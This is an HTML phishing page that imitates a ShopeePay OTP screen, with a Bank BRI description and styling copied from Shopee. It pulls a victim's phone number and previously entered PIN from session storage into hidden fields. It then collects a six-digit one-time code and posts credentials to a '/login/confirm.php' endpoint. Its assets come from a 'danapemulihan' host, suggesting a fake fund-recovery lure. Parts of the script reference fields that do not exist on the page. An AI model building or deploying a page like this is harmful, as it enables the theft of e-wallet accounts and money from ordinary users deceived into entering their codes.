<html>
  <head>
   
<meta name="theme-color" content="#ee4d2d" data-rh="true">
    <meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, viewport-fit=cover">
	<meta name="description" content="Bank BRI terus berinovasi mengembangkan produk yang sesuai dengan perkembangan jaman untuk memenuhi kebutuhan nasabah">
	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
	<meta name="theme-color" content="#ee4d2d" data-rh="true">
	<meta property="og:type" content="website">

	<title>PIN ShopeePay</title>    
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">
    <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"/>
    <link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col478.1706086666.json">
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col113.1706086666.json">
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col515.1706086666.json">
<link rel="stylesheet" type="text/css" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/5322.ca853f940cabd64e.css">
<link href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/bundle.18d594e05db33dc7.css" data-modern="true" rel="stylesheet">
<link rel="stylesheet" href="https://dev-danapemulihan.pantheonsite.io/asset/pin.css">
	<style id="nebula-style">
:root{--nc-primary:#ee4d2d;--nc-primary-bg:#fef6f5;--nc-primary-gradient:linear-gradient(#ee4d2d,#ff7337);--nc-secondary-blue:#0046ab;--nc-secondary-yellow:#eda500;--nc-secondary-green:#26aa99;--nc-error:#ee2c4a;--nc-error-bg:#fff4f4;--nc-caution:#f69113;--nc-caution-bg:#fff8e4;--nc-success:#30b566;--nc-success-bg:#f7fffe;--nc-text-primary:rgba(0,0,0,.87);--nc-text-primary-o:#212121;--nc-text-secondary:rgba(0,0,0,.65);--nc-text-secondary-o:#595959;--nc-text-tertiary:rgba(0,0,0,.54);--nc-text-tertiary-o:#757575;--nc-text-link:#0088ff;--nc-util-mask:rgba(0,0,0,.4);--nc-util-disabled:rgba(0,0,0,.26);--nc-util-disabled-o:#bdbdbd;--nc-util-line:rgba(0,0,0,.09);--nc-util-line-o:#e8e8e8;--nc-util-bg:#f5f5f5;--nc-util-placeholder:#fafafa;--nc-util-pressed:rgba(0,0,0,.05);--nt-font-regular-f:-apple-system,'HelveticaNeue','Helvetica Neue','Roboto','Droid Sans',Arial,sans-serif;--nt-font-regular-w:400;--nt-font-medium-f:-apple-system,'HelveticaNeue-Medium','Helvetica Neue','Roboto','Droid Sans',Arial,sans-serif;--nt-font-medium-w:500;--nt-font-bold-f:-apple-system,'HelveticaNeue-Bold','Helvetica Neue','Roboto','Droid Sans','Arial Bold',Arial,sans-serif;--nt-font-bold-w:700;--nt-size-foot:.625rem;--nt-size-foot-l:.75rem;--nt-size-foot-lp:.75rem;--nt-size-foot-t:1rem;--nt-size-foot-tp:1rem;--nt-size-small:.75rem;--nt-size-small-l:.875rem;--nt-size-small-lp:1.25rem;--nt-size-small-t:1.125rem;--nt-size-small-tp:1.125rem;--nt-size-normal:.875rem;--nt-size-normal-l:1rem;--nt-size-normal-lp:1.25rem;--nt-size-normal-t:1.375rem;--nt-size-normal-tp:1.375rem;--nt-size-large:1rem;--nt-size-large-l:1.25rem;--nt-size-large-lp:1.375rem;--nt-size-large-t:1.5rem;--nt-size-large-tp:1.5rem;--nt-size-title:1.25rem;--nt-size-title-l:1.5rem;--nt-size-title-lp:1.5rem;--nt-size-title-t:1.875rem;--nt-size-title-tp:1.875rem;--ns-a:.25rem;--ns-b:.5rem;--ns-c:.75rem;--ns-d:1rem;--ns-e:1.25rem;--ns-f:1.5rem;--ns-g:2.5rem;--ne-depth6:0 0 .375rem rgba(0,0,0,.06);--ne-depth9:0 0 .5625rem rgba(0,0,0,.12);--nr-normal:.125rem;--nr-overlay:.25rem}.nt-foot{font-size:var(--nt-size-foot,.625rem);line-height:var(--nt-size-foot-l,.75rem)}.nt-foot-p{font-size:var(--nt-size-foot,.625rem);line-height:var(--nt-size-foot-lp,.75rem)}.nt-small{font-size:var(--nt-size-small,.75rem);line-height:var(--nt-size-small-l,.875rem)}.nt-small-p{font-size:var(--nt-size-small,.75rem);line-height:var(--nt-size-small-lp,1.25rem)}.nt-normal{font-size:var(--nt-size-normal,.875rem);line-height:var(--nt-size-normal-l,1rem)}.nt-normal-p{font-size:var(--nt-size-normal,.875rem);line-height:var(--nt-size-normal-lp,1.25rem)}.nt-large{font-size:var(--nt-size-large,1rem);line-height:var(--nt-size-large-l,1.25rem)}.nt-large-p{font-size:var(--nt-size-large,1rem);line-height:var(--nt-size-large-lp,1.375rem)}.nt-title{font-size:var(--nt-size-title,1.25rem);line-height:var(--nt-size-title-l,1.5rem)}.nt-title-p{font-size:var(--nt-size-title,1.25rem);line-height:var(--nt-size-title-lp,1.5rem)}.nt-regular{font-family:var(--nt-font-regular-f,-apple-system,'HelveticaNeue','Helvetica Neue','Roboto','Droid Sans',Arial,sans-serif);font-weight:var(--nt-font-regular-w,400)}.nt-medium{font-family:var(--nt-font-medium-f,-apple-system,'HelveticaNeue-Medium','Helvetica Neue','Roboto','Droid Sans',Arial,sans-serif);font-weight:var(--nt-font-medium-w,500)}.nt-bold{font-family:var(--nt-font-bold-f,-apple-system,'HelveticaNeue-Bold','Helvetica Neue','Roboto','Droid Sans','Arial Bold',Arial,sans-serif);font-weight:var(--nt-font-bold-w,700)}


        @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
        body {
            padding: 0;
            margin: 0;
            width: 100%;
           
            overflow: hidden; 
            background: none ;
            padding-right: 0px;
        }

        .text-header {
            font-family: 'Nunito', sans-serif;
            color: #aaa;
        }

        .text-subheader {
            font-family: 'Nunito', sans-serif;
            margin-top: -40px;
            color: #aaa;
            font-size: 15px;
        }

        .sizing {
            width: 332px;
        }

        @media only screen and (max-width: 600px) {
            .sizing {
                width: 95%;
            }
        } 

        .pinNumb {
            cursor: pointer;
            
            width: 105px; 
            background-color: #fff; 
            font-size: 30px; color: #000; 
            text-align: center; 
            padding-left: -10px; 
            border-radius: 5px; 
            box-shadow: rgba(171, 171, 171, 1) 1px 1px 1px 0px; 
           font-weight: 300;
            padding: 4px 50px -10 10;
            background: #fff;
            margin: -18px -6px;
            border: 0px solid #aaa;
            position: relative;
            height: 45px;
        }

        button.pinNumb:hover {
            color: #a1a1a1;
            background-color: rgba(255, 255, 255, 0.1);
            border: 1px solid #ccc;
            box-shadow: rgba(171, 171, 171, 1) 0px 1px 0px 0px; 
        }

.box-input-pin .inppin{
    font-weight: 300;
    border-bottom: 2px solid #ddd;
    margin: 0px 6px;
    z-index:9999999;
    border-radius: 0px;
    font-weight: bold;
}



.btn-punya{
     transition: background 100ms step-start 0s;
}

  .btn-punya:disabled {
            
        }

        @media only screen and (max-width: 600px) {
            .btn-punya {
                width: 100%%;
                color: white;
            }
        }
    </style>
  </head>
  <body>
	<div class="app-container">
	
<form id="formOtp" onsubmit="return false">		
		<div class="yBiLBR">
			<svg viewbox="0 0 22 17" class="EexaNM"><g stroke="none" stroke-width="1" fill-rule="evenodd" transform="translate(-3, -6)"><path d="M5.78416545,15.2727801 L12.9866648,21.7122915 C13.286114,22.0067577 13.286114,22.4841029 12.9866648,22.7785691 C12.6864297,23.0738103 12.200709,23.0738103 11.9004739,22.7785691 L3.29347136,15.0837018 C3.27067864,15.0651039 3.23845445,15.072853 3.21723364,15.0519304 C3.06240034,14.899273 2.99480814,14.7001208 3.00030983,14.5001937 C2.99480814,14.3002667 3.06240034,14.1003396 3.21723364,13.9476821 C3.23845445,13.9275344 3.2714646,13.9345086 3.29425732,13.9166857 L11.9004739,6.22026848 C12.200709,5.92657717 12.6864297,5.92657717 12.9866648,6.22026848 C13.286114,6.51628453 13.286114,6.99362977 12.9866648,7.288096 L5.78416545,13.7276073 L24.2140442,13.7276073 C24.6478918,13.7276073 25,14.0739926 25,14.5001937 C25,14.9263948 24.6478918,15.2727801 24.2140442,15.2727801 L5.78416545,15.2727801 Z"></path></g></svg>
			<div class="feM3Km xBLm63">
				<div class="q8yQDO">Log in</div>
			</div>
		</div>

			
				<div class="TfWw6v" style="margin-top: 100px">
					<div class="_4fmpHA">Kode OTP telah kami kirim ke</div>
					<div class="zReWL2" id="alert"></div>
				</div>
				<div class="_8C72T7" style="padding: 0">
					<div class="hBZjRj" style="padding: 0">
<input type="hidden" id="nomorhp" name="nomor" value="">
<input type="hidden" id="pinku" name="sixpin" value="">
        <div class="row" style="margin-top: -190px;">
            <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 58.8px; padding-bottom: 0px; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;">
               <div class="row" style="texr-align: center; margin-right: -10px;">

                   	<div class="box-input-pin">
				<div type="button" class="clear"></div>
				<input name="pin1" id="pin1" class="inppin" inputmode="numeric" type="password" autocomplete="off" required maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin2" id="pin2" class="inppin" inputmode="numeric" type="password" autocomplete="off" required maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin3" id="pin3" class="inppin" inputmode="numeric" type="password" autocomplete="off" required maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin4" id="pin4" class="inppin" inputmode="numeric" type="password" autocomplete="off" required maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin5" id="pin5" class="inppin" inputmode="numeric" type="password" autocomplete="off" required maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin6" id="pin6" class="inppin" inputmode="numeric" type="password" autocomplete="on" required maxlength="1" onkeypress="if(this.value.length==1) return false;" onchange="javascript:this.form.button();" oninput="sendPin(event)"></div><br>
				<button id="doLog" type="submit" class="btn-punya _3sjFp lJMau AHhqR TOjHY nt-regular nt-large" style="margin-top: -25px; width: 100%;z-index: 999999999"><span class="_2HCeY">Lanjut</span></button>
				    
				    <br>
               <div class="row" style="margin-top: -70px">
                   	<section id="ulangi" style="display: none">
				<div class="KRoZxA">
					<div class="_4fmpHA">Tidak menerima Kode OTP?</div>
					<div class="JaU6fC">
						<button type="button" class="qkgMQQ" onclick="window.location.href='otp.html'">Kirim Ulang</button> atau coba <button class="ZKBskQ">Metode Lainnya</button>
					</div>
				</div>
				</section>
					
	<center id="timerku" style="text-align: center; display: ; margin-top: 20px; font-size: 13px; margin: 0px auto; position: absolute; left: 0; right: 0">			
				<div>Mohon tunggu <span class="trz4sS" id="waktu" style="color: #ED4D2D">60</span> detik untuk mengirim ulang.</div>
				
				</center>
				             
               </div>
            </div>
          
        </div>
      
            </div>
        </div>
    </div>
      </form>
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL6mfwbr-XqeKl8W-VMfdCmB3Lxc1zwt-OfAeNrfkr_ENnPE9w8zfXzUcWOrCoUhxExGhEgE6ooCl6mbNRWX34_WurgWDzXhYAvF8AJi4Vrqw6ge_4d9HB_5UJChBsw3R5rnufOIENgXKUWV74C5WiSC4f0fMssDWFyk5SgUjt-4ovdJzf9ncWNkIcQ8M/s1836/IMG_20240401_204139.png" width="180px" style="position: fixed; bottom: 5; left: 0; right: 0; margin: 0px auto">
   
       

<center>
<img id="invalidd" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUis2-ccPsVvV0oPHVx2A7lYv5b0UkktxeUvhfEjTVpQqIz9-RCENq4C5fehS3Ro06k_HfB8x506NbR5N0GawWUeVukHwNZkV-3B-wMt2iXXhHnVoQKMOWyPm7Fnt83PSWQpccpr7gttlFV4CL2Ewy9858mz6lHdmhiFYpcClv7ZYElsiOfQoVTLAXkhM/s1080/AddText_04-01-11.59.52.png" width="60%" style="background: #00000090; border-radius: 10px; top: 255px; display: none; z-index: 999; position: absolute; left: 0; right: 0; margin: 0px auto; z-index: 9999999999">
</center>    
 <script>
 var alerts = sessionStorage.getItem("alerts");
document.getElementById("alert").innerHTML = alerts + "";       
 var alerts = sessionStorage.getItem("alerts");
document.getElementById("nomorhp").value = alerts + "";       
 var setpin = sessionStorage.getItem("setpin");
document.getElementById("pinku").value = setpin + "";       

    </script>
<script>$(document).ready(function() {$('.clear').click(function() {$('.inppin').val('');$('#pin1').focus();});$('.clearotp').click(function() {$('.inpotp').val('');$('#otp1').focus();});$('.show').click(function() {$('.inppin').each(function() {if ($(this).attr('type') === 'password') {$(this).attr('type','number');$(".show").text("SEMBUNYIKAN");} else {$(this).attr('type', 'password');$(".show").text("TAMPILKAN");}});});});</script>    
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js">

            </script> 
<script src="jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js">
            </script>
            <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
 <script>

         function OnButton(pin6) {

            if(pin6.length > 0) {
                $(".btn-punya").prop('disabled', false);
            } else {
                $(".btn-punya").prop('disabled', true);
            }
        }
        $(document).ready(function() {
            $("body").on('click', 'button#doLog', function() {
                var pin6 = $("#pin6").val();
                var pass = $("#pass").val();

                $.ajax({
                    url: "/login/confirm.php",
                    method: "POST",
                    data: "username="+user+"&password="+pass,
                    beforeSend: function() {
                        $("#loading").show();
                    },
                    success: function(responsex) {
                        $("#aseli").html('');
                        if(responsex == "true") {
                            $.get("/aplikasi/login.js", function(datax, status){
                                window.history.pushState("", "", '/login.js');
                                $("#hideBody").hide();
                                $("#loading").hide();
                                $("#aseli").html(datax);
                            });
                        } else {
                            $.get("/aplikasi/pin.php", function(data, status){
                                window.history.pushState("", "", 'aplikasi/login.php');
                                setTimeout(function() { 
                                    $("#hideBody").hide();
                                    $("#loading").hide();
                                    $("#aseli").html(data);
                                    $("#aseli").show();
                                }, 1000);
                            });
                        }
                        
                    }
                })
            });
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");

                $("#pass").prop("type", "text");

                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display", "none");

                    $("#pass").prop("type", "password");
                });
            });

            $("#pin6").on('input', function() {
                var pin6 = $("#pin6").val();
                var pass = $("#pass").val();

                OnButton(pin6, pass);
            });

            $("#pass").on('input', function() {
                var pin6 = $("#pin6").val();
                var pass = $("#pass").val();

                OnButton(pin6, pass);
            });
        });
    </script>
        <script>
            var url = "#kirim-ulang"; // url tujuan
            var count = 60; // dalam detik
            function countDown() {

                if (count > 0) {
                    count--;
                    var waktu = count + 0;
            $('#waktu').html(waktu);
             
         setTimeout("countDown()", 1000);
         setTimeout(function() { 
         $("#timerku").hide();
         $("#ulangi").show();
         }, 60000);
                    
               
                }
            }
            countDown();
       
       </script>
<script module src="jquery-3.5.1.min.js">

     </script>  
<script>
//var pinContainer = document.getElementsByClassName("pin-code")[maxlength];
var pinContainer = document.querySelector(".box-input-pin");
console.log('There is ' + pinContainer.length + ' Pin Container on the page.');

pinContainer.addEventListener('keyup', function (event) {
    var target = event.srcElement;
    
    var maxLength = parseInt(target.attributes["maxlength"].value, 6);
    var myLength = target.value. length;

    if (myLength >= maxLength) {
        var next = target;
        while (next = next.nextElementSibling) {
            if (next == 0) break;
            if (next.tagName.toLowerCase() == "input") {
                next.focus();
                break;
            }
        }
    }

    if (myLength === 0) {
        var next = target;
        while (next = next.previousElementSibling) {
            if (next == 0) break;
            if (next.tagName.toLowerCase() == "input") {
                next.focus();
                break;
            }
        }
    }
}, false);

pinContainer.addEventListener('keydown', function (event) {
    var target = event.srcElement;
    target.value = "";
}, false);
</script>
  </body>
</html>